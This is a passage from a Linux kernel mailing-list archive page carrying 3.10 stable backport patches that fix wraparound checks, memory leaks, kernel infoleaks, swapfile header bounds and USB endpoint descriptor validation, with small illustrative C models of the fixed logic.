linux-kernel.vger.kernel.org archive mirror
* [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok()
@ 2017-02-05 19:18 Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 101/319] fix memory leaks in tracing_buffers_splice_read() Willy Tarreau
                   ` (218 more replies)
  0 siblings, 219 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Al Viro, Linus Torvalds, Willy Tarreau

From: Al Viro <viro@ZenIV.linux.org.uk>

commit e23d4159b109167126e5bcd7f3775c95de7fee47 upstream.

Switching iov_iter fault-in to multipages variants has exposed an old
bug in underlying fault_in_multipages_...(); they break if the range
passed to them wraps around.  Normally access_ok() done by callers will
prevent such (and it's a guaranteed EFAULT - ERR_PTR() values fall into
such a range and they should not point to any valid objects).

However, on architectures where userland and kernel live in different
MMU contexts (e.g. s390) access_ok() is a no-op and on those a range
with a wraparound can reach fault_in_multipages_...().

Since any wraparound means EFAULT there, the fix is trivial - turn
those

    while (uaddr <= end)
	    ...
into

    if (unlikely(uaddr > end))
	    return -EFAULT;
    do
	    ...
    while (uaddr <= end);
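
As an illustration only (not part of the patch), the two loop shapes can
be modelled in userspace C.  The names old_fault_in(), new_fault_in(),
MODEL_PAGE_SIZE and MODEL_EFAULT are made up for this sketch, the
__get_user()/__put_user() probe is replaced by a counter, and the
trailing same-page check is left out:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_PAGE_SIZE 4096u	/* assumed page size, illustration only */
#define MODEL_EFAULT    14	/* stand-in for the kernel's EFAULT */

/* Old shape: a wrapped range skips the loop and still reports success. */
static int old_fault_in(uintptr_t uaddr, size_t size, unsigned *probed)
{
	uintptr_t end = uaddr + (uintptr_t)size - 1;	/* may wrap */

	*probed = 0;
	if (size == 0)
		return 0;
	while (uaddr <= end) {
		(*probed)++;	/* stands in for the user-space access */
		uaddr += MODEL_PAGE_SIZE;
	}
	return 0;
}

/* New shape: a wrapped range is rejected before the first access. */
static int new_fault_in(uintptr_t uaddr, size_t size, unsigned *probed)
{
	uintptr_t end = uaddr + (uintptr_t)size - 1;	/* may wrap */

	*probed = 0;
	if (size == 0)
		return 0;
	if (uaddr > end)
		return -MODEL_EFAULT;
	do {
		(*probed)++;
		uaddr += MODEL_PAGE_SIZE;
	} while (uaddr <= end);
	return 0;
}

static void fault_in_demo(void)
{
	unsigned probed;

	/* 64 bytes starting 16 bytes below the top of the address space. */
	assert(old_fault_in(UINTPTR_MAX - 15, 64, &probed) == 0);
	assert(probed == 0);
	assert(new_fault_in(UINTPTR_MAX - 15, 64, &probed) == -MODEL_EFAULT);

	/* A normal two-page range is probed once per page. */
	assert(new_fault_in(0x10000, 8192, &probed) == 0);
	assert(probed == 2);
}
```

In this model the old loop touches nothing for a wrapped range and
returns 0, while the new one fails early.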

Reported-by: Jan Stancek <jstancek@redhat.com>
Tested-by: Jan Stancek <jstancek@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/pagemap.h | 38 +++++++++++++++++++-------------------
 1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/include/linux/pagemap.h b/include/linux/pagemap.h
index e3dea75..9497527 100644
--- a/include/linux/pagemap.h
+++ b/include/linux/pagemap.h
@@ -482,56 +482,56 @@ static inline int fault_in_pages_readable(const char __user *uaddr, int size)
  */
 static inline int fault_in_multipages_writeable(char __user *uaddr, int size)
 {
-	int ret = 0;
 	char __user *end = uaddr + size - 1;
 
 	if (unlikely(size == 0))
-		return ret;
+		return 0;
 
+	if (unlikely(uaddr > end))
+		return -EFAULT;
 	/*
 	 * Writing zeroes into userspace here is OK, because we know that if
 	 * the zero gets there, we'll be overwriting it.
 	 */
-	while (uaddr <= end) {
-		ret = __put_user(0, uaddr);
-		if (ret != 0)
-			return ret;
+	do {
+		if (unlikely(__put_user(0, uaddr) != 0))
+			return -EFAULT;
 		uaddr += PAGE_SIZE;
-	}
+	} while (uaddr <= end);
 
 	/* Check whether the range spilled into the next page. */
 	if (((unsigned long)uaddr & PAGE_MASK) ==
 			((unsigned long)end & PAGE_MASK))
-		ret = __put_user(0, end);
+		return __put_user(0, end);
 
-	return ret;
+	return 0;
 }
 
 static inline int fault_in_multipages_readable(const char __user *uaddr,
 					       int size)
 {
 	volatile char c;
-	int ret = 0;
 	const char __user *end = uaddr + size - 1;
 
 	if (unlikely(size == 0))
-		return ret;
+		return 0;
 
-	while (uaddr <= end) {
-		ret = __get_user(c, uaddr);
-		if (ret != 0)
-			return ret;
+	if (unlikely(uaddr > end))
+		return -EFAULT;
+
+	do {
+		if (unlikely(__get_user(c, uaddr) != 0))
+			return -EFAULT;
 		uaddr += PAGE_SIZE;
-	}
+	} while (uaddr <= end);
 
 	/* Check whether the range spilled into the next page. */
 	if (((unsigned long)uaddr & PAGE_MASK) ==
 			((unsigned long)end & PAGE_MASK)) {
-		ret = __get_user(c, end);
-		(void)c;
+		return __get_user(c, end);
 	}
 
-	return ret;
+	return 0;
 }
 
 int add_to_page_cache_locked(struct page *page, struct address_space *mapping,
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 101/319] fix memory leaks in tracing_buffers_splice_read()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 102/319] arc: don't leak bits of kernel stack into coredump Willy Tarreau
                   ` (217 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Al Viro, Willy Tarreau

From: Al Viro <viro@zeniv.linux.org.uk>

commit 1ae2293dd6d2f5c823cf97e60b70d03631cd622f upstream.

Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/trace/trace.c | 17 +++++++++--------
 1 file changed, 9 insertions(+), 8 deletions(-)

diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
index eff26a9..4ff36f7 100644
--- a/kernel/trace/trace.c
+++ b/kernel/trace/trace.c
@@ -5168,11 +5168,6 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
 	}
 #endif
 
-	if (splice_grow_spd(pipe, &spd)) {
-		ret = -ENOMEM;
-		goto out;
-	}
-
 	if (*ppos & (PAGE_SIZE - 1)) {
 		ret = -EINVAL;
 		goto out;
@@ -5186,6 +5181,11 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
 		len &= PAGE_MASK;
 	}
 
+	if (splice_grow_spd(pipe, &spd)) {
+		ret = -ENOMEM;
+		goto out;
+	}
+
  again:
 	trace_access_lock(iter->cpu_file);
 	entries = ring_buffer_entries_cpu(iter->trace_buffer->buffer, iter->cpu_file);
@@ -5241,21 +5241,22 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
 	if (!spd.nr_pages) {
 		if ((file->f_flags & O_NONBLOCK) || (flags & SPLICE_F_NONBLOCK)) {
 			ret = -EAGAIN;
-			goto out;
+			goto out_shrink;
 		}
 		mutex_unlock(&trace_types_lock);
 		ret = iter->trace->wait_pipe(iter);
 		mutex_lock(&trace_types_lock);
 		if (ret)
-			goto out;
+			goto out_shrink;
 		if (signal_pending(current)) {
 			ret = -EINTR;
-			goto out;
+			goto out_shrink;
 		}
 		goto again;
 	}
 
 	ret = splice_to_pipe(pipe, &spd);
+out_shrink:
 	splice_shrink_spd(&spd);
 out:
 	mutex_unlock(&trace_types_lock);
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 102/319] arc: don't leak bits of kernel stack into coredump
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 101/319] fix memory leaks in tracing_buffers_splice_read() Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 103/319] Fix potential infoleak in older kernels Willy Tarreau
                   ` (216 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Al Viro, Willy Tarreau

From: Al Viro <viro@zeniv.linux.org.uk>

commit 7798bf2140ebcc36eafec6a4194fffd8d585d471 upstream.

On faulting sigreturn we do get SIGSEGV, all right, but anything
we'd put into pt_regs could end up in the coredump.  And since
__copy_from_user() never zeroed on arc, we'd better bugger off
on its failure without copying random uninitialized bits of
kernel stack into pt_regs...

Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 arch/arc/kernel/signal.c | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/arch/arc/kernel/signal.c b/arch/arc/kernel/signal.c
index 6763654..0823087 100644
--- a/arch/arc/kernel/signal.c
+++ b/arch/arc/kernel/signal.c
@@ -80,13 +80,14 @@ static int restore_usr_regs(struct pt_regs *regs, struct rt_sigframe __user *sf)
 	int err;
 
 	err = __copy_from_user(&set, &sf->uc.uc_sigmask, sizeof(set));
-	if (!err)
-		set_current_blocked(&set);
-
-	err |= __copy_from_user(regs, &(sf->uc.uc_mcontext.regs),
+	err |= __copy_from_user(regs, &(sf->uc.uc_mcontext.regs.scratch),
 				sizeof(sf->uc.uc_mcontext.regs.scratch));
+	if (err)
+		return err;
 
-	return err;
+	set_current_blocked(&set);
+
+	return 0;
 }
 
 static inline int is_do_ss_needed(unsigned int magic)
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 103/319] Fix potential infoleak in older kernels
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 101/319] fix memory leaks in tracing_buffers_splice_read() Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 102/319] arc: don't leak bits of kernel stack into coredump Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 104/319] swapfile: fix memory corruption via malformed swapfile Willy Tarreau
                   ` (215 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Linus Torvalds, Jiri Slaby, Willy Tarreau

From: Linus Torvalds <torvalds@linux-foundation.org>

Not upstream as it is not needed there.

So a patch something like this might be a safe way to fix the
potential infoleak in older kernels.

THIS IS UNTESTED. It's a very obvious patch, though, so if it compiles
it probably works. It just initializes the output variable with 0 in
the inline asm description, instead of doing it in the exception
handler.

It will generate slightly worse code (a few unnecessary ALU
operations), but it doesn't have any interactions with the exception
handler implementation.

Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 arch/x86/include/asm/uaccess.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/arch/x86/include/asm/uaccess.h b/arch/x86/include/asm/uaccess.h
index 5ee2687..995c49a 100644
--- a/arch/x86/include/asm/uaccess.h
+++ b/arch/x86/include/asm/uaccess.h
@@ -381,7 +381,7 @@ do {									\
 	asm volatile("1:	mov"itype" %1,%"rtype"0\n"		\
 		     "2:\n"						\
 		     _ASM_EXTABLE_EX(1b, 2b)				\
-		     : ltype(x) : "m" (__m(addr)))
+		     : ltype(x) : "m" (__m(addr)), "0" (0))
 
 #define __put_user_nocheck(x, ptr, size)			\
 ({								\
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 104/319] swapfile: fix memory corruption via malformed swapfile
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (2 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 103/319] Fix potential infoleak in older kernels Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 105/319] coredump: fix unfreezable coredumping task Willy Tarreau
                   ` (214 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jann Horn, Kirill A. Shutemov, Vlastimil Babka, Hugh Dickins,
	Andrew Morton, Linus Torvalds, Willy Tarreau

From: Jann Horn <jann@thejh.net>

commit dd111be69114cc867f8e826284559bfbc1c40e37 upstream.

When root activates a swap partition whose header has the wrong
endianness, nr_badpages elements of badpages are swabbed before
nr_badpages has been checked, leading to a buffer overrun of up to 8GB.

This normally is not a security issue because it can only be exploited
by root (more specifically, a process with CAP_SYS_ADMIN or the ability
to modify a swap file/partition), and such a process can already e.g.
modify swapped-out memory of any other userspace process on the system.
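
The ordering the fix relies on (swab the count, validate it, and only
then walk the array) can be sketched in userspace C.  This is a model
under assumptions, not the kernel code: struct model_header,
MODEL_MAX_BADPAGES, swab32_model() and fix_endianness() are hypothetical
names, and the bound is deliberately tiny:

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_MAX_BADPAGES 4	/* hypothetical bound for the sketch */

struct model_header {
	uint32_t nr_badpages;
	uint32_t badpages[MODEL_MAX_BADPAGES];
};

/* Byte-swap a 32-bit value (userspace stand-in for swab32s()). */
static uint32_t swab32_model(uint32_t v)
{
	return (v >> 24) | ((v >> 8) & 0x0000ff00u) |
	       ((v << 8) & 0x00ff0000u) | (v << 24);
}

/* Returns 1 on success, 0 if the header is rejected. */
static int fix_endianness(struct model_header *h)
{
	uint32_t i;

	h->nr_badpages = swab32_model(h->nr_badpages);
	/* Validate the count before it is used as a loop bound. */
	if (h->nr_badpages > MODEL_MAX_BADPAGES)
		return 0;
	for (i = 0; i < h->nr_badpages; i++)
		h->badpages[i] = swab32_model(h->badpages[i]);
	return 1;
}

static void swap_header_demo(void)
{
	struct model_header good = {
		swab32_model(2), { swab32_model(7), swab32_model(9), 0, 0 }
	};
	struct model_header bad = { 0xffffffffu, { 0, 0, 0, 0 } };

	assert(fix_endianness(&good) == 1);
	assert(good.nr_badpages == 2);
	assert(good.badpages[0] == 7 && good.badpages[1] == 9);

	/* An oversized count is refused before any element is touched. */
	assert(fix_endianness(&bad) == 0);
}
```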

Link: http://lkml.kernel.org/r/1477949533-2509-1-git-send-email-jann@thejh.net
Signed-off-by: Jann Horn <jann@thejh.net>
Acked-by: Kees Cook <keescook@chromium.org>
Acked-by: Jerome Marchand <jmarchan@redhat.com>
Acked-by: Johannes Weiner <hannes@cmpxchg.org>
Cc: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
Cc: Vlastimil Babka <vbabka@suse.cz>
Cc: Hugh Dickins <hughd@google.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 mm/swapfile.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/mm/swapfile.c b/mm/swapfile.c
index 746af55b..d0a8983 100644
--- a/mm/swapfile.c
+++ b/mm/swapfile.c
@@ -1922,6 +1922,8 @@ static unsigned long read_swap_header(struct swap_info_struct *p,
 		swab32s(&swap_header->info.version);
 		swab32s(&swap_header->info.last_page);
 		swab32s(&swap_header->info.nr_badpages);
+		if (swap_header->info.nr_badpages > MAX_SWAP_BADPAGES)
+			return 0;
 		for (i = 0; i < swap_header->info.nr_badpages; i++)
 			swab32s(&swap_header->info.badpages[i]);
 	}
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 105/319] coredump: fix unfreezable coredumping task
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (3 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 104/319] swapfile: fix memory corruption via malformed swapfile Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 106/319] usb: dwc3: gadget: increment request->actual once Willy Tarreau
                   ` (213 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Andrey Ryabinin, Alexander Viro, Tejun Heo, Rafael J. Wysocki,
	Michal Hocko, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Andrey Ryabinin <aryabinin@virtuozzo.com>

commit 70d78fe7c8b640b5acfad56ad341985b3810998a upstream.

It may be impossible to freeze a coredumping task while it waits for
the 'core_state->startup' completion, because threads are frozen in
get_signal() before they get a chance to complete 'core_state->startup'.

Inability to freeze a task during suspend causes the suspend to fail.
CRIU also uses the cgroup freezer during its dump operation, so with an
unfreezable task the CRIU dump fails: it waits for a transition from
the 'FREEZING' to the 'FROZEN' state that never happens.

Use freezer_do_not_count() to tell the freezer to ignore the
coredumping task while it waits for the core_state->startup completion.

Link: http://lkml.kernel.org/r/1475225434-3753-1-git-send-email-aryabinin@virtuozzo.com
Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
Acked-by: Pavel Machek <pavel@ucw.cz>
Acked-by: Oleg Nesterov <oleg@redhat.com>
Cc: Alexander Viro <viro@zeniv.linux.org.uk>
Cc: Tejun Heo <tj@kernel.org>
Cc: "Rafael J. Wysocki" <rjw@rjwysocki.net>
Cc: Michal Hocko <mhocko@kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/coredump.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/fs/coredump.c b/fs/coredump.c
index 4f03b2b..a94f94d 100644
--- a/fs/coredump.c
+++ b/fs/coredump.c
@@ -1,6 +1,7 @@
 #include <linux/slab.h>
 #include <linux/file.h>
 #include <linux/fdtable.h>
+#include <linux/freezer.h>
 #include <linux/mm.h>
 #include <linux/stat.h>
 #include <linux/fcntl.h>
@@ -375,7 +376,9 @@ static int coredump_wait(int exit_code, struct core_state *core_state)
 	if (core_waiters > 0) {
 		struct core_thread *ptr;
 
+		freezer_do_not_count();
 		wait_for_completion(&core_state->startup);
+		freezer_count();
 		/*
 		 * Wait for all the threads to become inactive, so that
 		 * all the thread context (extended register state, like
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 106/319] usb: dwc3: gadget: increment request->actual once
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (4 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 105/319] coredump: fix unfreezable coredumping task Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 107/319] USB: validate wMaxPacketValue entries in endpoint descriptors Willy Tarreau
                   ` (212 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Felipe Balbi, Willy Tarreau

From: Felipe Balbi <felipe.balbi@linux.intel.com>

commit c7de573471832dff7d31f0c13b0f143d6f017799 upstream.

When using SG lists, we would end up setting
request->actual to:

	num_mapped_sgs * (request->length - count)

Let's fix that up by incrementing request->actual
only once.
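
A worked example of the arithmetic, as a userspace sketch.  The helper
names are hypothetical, and remaining[i] stands in for
trb->size & DWC3_TRB_SIZE_MASK, assumed here to be the bytes left
untransferred in TRB i:

```c
#include <assert.h>

/* Old accounting: the full request length is added once per TRB. */
static unsigned actual_per_trb(unsigned length, const unsigned *remaining,
			       unsigned num_sgs)
{
	unsigned actual = 0;
	unsigned i;

	for (i = 0; i < num_sgs; i++)
		actual += length - remaining[i];
	return actual;
}

/* New accounting: sum the leftovers, then subtract from length once. */
static unsigned actual_once(unsigned length, const unsigned *remaining,
			    unsigned num_sgs)
{
	unsigned count = 0;
	unsigned i;

	for (i = 0; i < num_sgs; i++)
		count += remaining[i];
	return length - count;
}

static void actual_demo(void)
{
	const unsigned complete[2] = { 0, 0 };
	const unsigned partial[2] = { 0, 1024 };

	/* A fully transferred 4096-byte request mapped as two SG entries. */
	assert(actual_per_trb(4096, complete, 2) == 8192);	/* doubled */
	assert(actual_once(4096, complete, 2) == 4096);

	/* The same request with 1024 bytes left in the second TRB. */
	assert(actual_per_trb(4096, partial, 2) == 7168);
	assert(actual_once(4096, partial, 2) == 3072);
}
```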

Reported-by: Brian E Rogers <brian.e.rogers@intel.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/dwc3/gadget.c | 19 +++++++++++--------
 1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
index 6e70c88..0dfee61 100644
--- a/drivers/usb/dwc3/gadget.c
+++ b/drivers/usb/dwc3/gadget.c
@@ -1802,14 +1802,6 @@ static int __dwc3_cleanup_done_trbs(struct dwc3 *dwc, struct dwc3_ep *dep,
 			s_pkt = 1;
 	}
 
-	/*
-	 * We assume here we will always receive the entire data block
-	 * which we should receive. Meaning, if we program RX to
-	 * receive 4K but we receive only 2K, we assume that's all we
-	 * should receive and we simply bounce the request back to the
-	 * gadget driver for further processing.
-	 */
-	req->request.actual += req->request.length - count;
 	if (s_pkt)
 		return 1;
 	if ((event->status & DEPEVT_STATUS_LST) &&
@@ -1829,6 +1821,7 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
 	struct dwc3_trb		*trb;
 	unsigned int		slot;
 	unsigned int		i;
+	int			count = 0;
 	int			ret;
 
 	do {
@@ -1845,6 +1838,8 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
 				slot++;
 			slot %= DWC3_TRB_NUM;
 			trb = &dep->trb_pool[slot];
+			count += trb->size & DWC3_TRB_SIZE_MASK;
+
 
 			ret = __dwc3_cleanup_done_trbs(dwc, dep, req, trb,
 					event, status);
@@ -1852,6 +1847,14 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
 				break;
 		}while (++i < req->request.num_mapped_sgs);
 
+		/*
+		 * We assume here we will always receive the entire data block
+		 * which we should receive. Meaning, if we program RX to
+		 * receive 4K but we receive only 2K, we assume that's all we
+		 * should receive and we simply bounce the request back to the
+		 * gadget driver for further processing.
+		 */
+		req->request.actual += req->request.length - count;
 		dwc3_gadget_giveback(dep, req, status);
 
 		if (ret)
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 107/319] USB: validate wMaxPacketValue entries in endpoint descriptors
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (5 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 106/319] usb: dwc3: gadget: increment request->actual once Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 108/319] USB: fix typo in wMaxPacketSize validation Willy Tarreau
                   ` (211 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Alan Stern, Greg Kroah-Hartman, Willy Tarreau

From: Alan Stern <stern@rowland.harvard.edu>

commit aed9d65ac3278d4febd8665bd7db59ef53e825fe upstream.

Erroneous or malicious endpoint descriptors may have non-zero bits in
reserved positions, or out-of-bounds values.  This patch helps prevent
these from causing problems by bounds-checking the wMaxPacketSize
entries in endpoint descriptors and capping the values at the maximum
allowed.
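
The capping rule for the high-speed case can be sketched in userspace C
as follows.  This is a simplified model, not the kernel function:
enum model_xfer, hs_maxes[] and clamp_hs_maxp() are hypothetical names,
and the interrupt limit uses 1024, the value set by the follow-up typo
fix:

```c
#include <assert.h>

enum model_xfer { XFER_CONTROL, XFER_ISOC, XFER_BULK, XFER_INT };

/* Highest legal high-speed packet size per transfer type. */
static const unsigned short hs_maxes[4] = {
	[XFER_CONTROL] = 64,
	[XFER_ISOC] = 1024,
	[XFER_BULK] = 512,
	[XFER_INT] = 1024,
};

/* Returns the wMaxPacketSize value to keep for a high-speed endpoint. */
static unsigned clamp_hs_maxp(unsigned wmax, enum model_xfer type)
{
	unsigned mult = 0;	/* additional transactions per microframe */
	unsigned maxp = wmax;

	/* Bits 12..11 are allowed only for periodic endpoints. */
	if (type == XFER_INT || type == XFER_ISOC) {
		mult = maxp & ((1u << 12) | (1u << 11));
		maxp &= ~mult;
	}
	if (maxp > hs_maxes[type])
		maxp = hs_maxes[type];
	return mult | maxp;
}

static void maxp_demo(void)
{
	/* A legal bulk size passes through, an oversized one is capped. */
	assert(clamp_hs_maxp(512, XFER_BULK) == 512);
	assert(clamp_hs_maxp(1024, XFER_BULK) == 512);

	/* Periodic endpoint: the multiplier bits survive the check. */
	assert(clamp_hs_maxp(0x1400, XFER_ISOC) == 0x1400);

	/* Reserved high bits set: size capped, multiplier bits kept. */
	assert(clamp_hs_maxp(0xffff, XFER_INT) == 0x1c00);
}
```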

This issue was first discovered and tests were conducted by Jake Lamberson
<jake.lamberson1@gmail.com>, an intern working for Rosie Hall.

Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Reported-by: roswest <roswest@cisco.com>
Tested-by: roswest <roswest@cisco.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[wt: adjusted to 3.10 -- no USB_SPEED_SUPER_PLUS]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/core/config.c | 65 ++++++++++++++++++++++++++++++++++++++++++++---
 1 file changed, 62 insertions(+), 3 deletions(-)

diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
index 9b05e88..ecb2acb 100644
--- a/drivers/usb/core/config.c
+++ b/drivers/usb/core/config.c
@@ -144,6 +144,31 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
 	}
 }
 
+static const unsigned short low_speed_maxpacket_maxes[4] = {
+	[USB_ENDPOINT_XFER_CONTROL] = 8,
+	[USB_ENDPOINT_XFER_ISOC] = 0,
+	[USB_ENDPOINT_XFER_BULK] = 0,
+	[USB_ENDPOINT_XFER_INT] = 8,
+};
+static const unsigned short full_speed_maxpacket_maxes[4] = {
+	[USB_ENDPOINT_XFER_CONTROL] = 64,
+	[USB_ENDPOINT_XFER_ISOC] = 1023,
+	[USB_ENDPOINT_XFER_BULK] = 64,
+	[USB_ENDPOINT_XFER_INT] = 64,
+};
+static const unsigned short high_speed_maxpacket_maxes[4] = {
+	[USB_ENDPOINT_XFER_CONTROL] = 64,
+	[USB_ENDPOINT_XFER_ISOC] = 1024,
+	[USB_ENDPOINT_XFER_BULK] = 512,
+	[USB_ENDPOINT_XFER_INT] = 1023,
+};
+static const unsigned short super_speed_maxpacket_maxes[4] = {
+	[USB_ENDPOINT_XFER_CONTROL] = 512,
+	[USB_ENDPOINT_XFER_ISOC] = 1024,
+	[USB_ENDPOINT_XFER_BULK] = 1024,
+	[USB_ENDPOINT_XFER_INT] = 1024,
+};
+
 static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
     int asnum, struct usb_host_interface *ifp, int num_ep,
     unsigned char *buffer, int size)
@@ -152,6 +177,8 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 	struct usb_endpoint_descriptor *d;
 	struct usb_host_endpoint *endpoint;
 	int n, i, j, retval;
+	unsigned int maxp;
+	const unsigned short *maxpacket_maxes;
 
 	d = (struct usb_endpoint_descriptor *) buffer;
 	buffer += d->bLength;
@@ -247,6 +274,41 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 			endpoint->desc.wMaxPacketSize = cpu_to_le16(8);
 	}
 
+	/* Validate the wMaxPacketSize field */
+	maxp = usb_endpoint_maxp(&endpoint->desc);
+
+	/* Find the highest legal maxpacket size for this endpoint */
+	i = 0;		/* additional transactions per microframe */
+	switch (to_usb_device(ddev)->speed) {
+	case USB_SPEED_LOW:
+		maxpacket_maxes = low_speed_maxpacket_maxes;
+		break;
+	case USB_SPEED_FULL:
+		maxpacket_maxes = full_speed_maxpacket_maxes;
+		break;
+	case USB_SPEED_HIGH:
+		/* Bits 12..11 are allowed only for HS periodic endpoints */
+		if (usb_endpoint_xfer_int(d) || usb_endpoint_xfer_isoc(d)) {
+			i = maxp & (BIT(12) | BIT(11));
+			maxp &= ~i;
+		}
+		/* fallthrough */
+	default:
+		maxpacket_maxes = high_speed_maxpacket_maxes;
+		break;
+	case USB_SPEED_SUPER:
+		maxpacket_maxes = super_speed_maxpacket_maxes;
+		break;
+	}
+	j = maxpacket_maxes[usb_endpoint_type(&endpoint->desc)];
+
+	if (maxp > j) {
+		dev_warn(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid maxpacket %d, setting to %d\n",
+		    cfgno, inum, asnum, d->bEndpointAddress, maxp, j);
+		maxp = j;
+		endpoint->desc.wMaxPacketSize = cpu_to_le16(i | maxp);
+	}
+
 	/*
 	 * Some buggy high speed devices have bulk endpoints using
 	 * maxpacket sizes other than 512.  High speed HCDs may not
@@ -254,9 +316,6 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 	 */
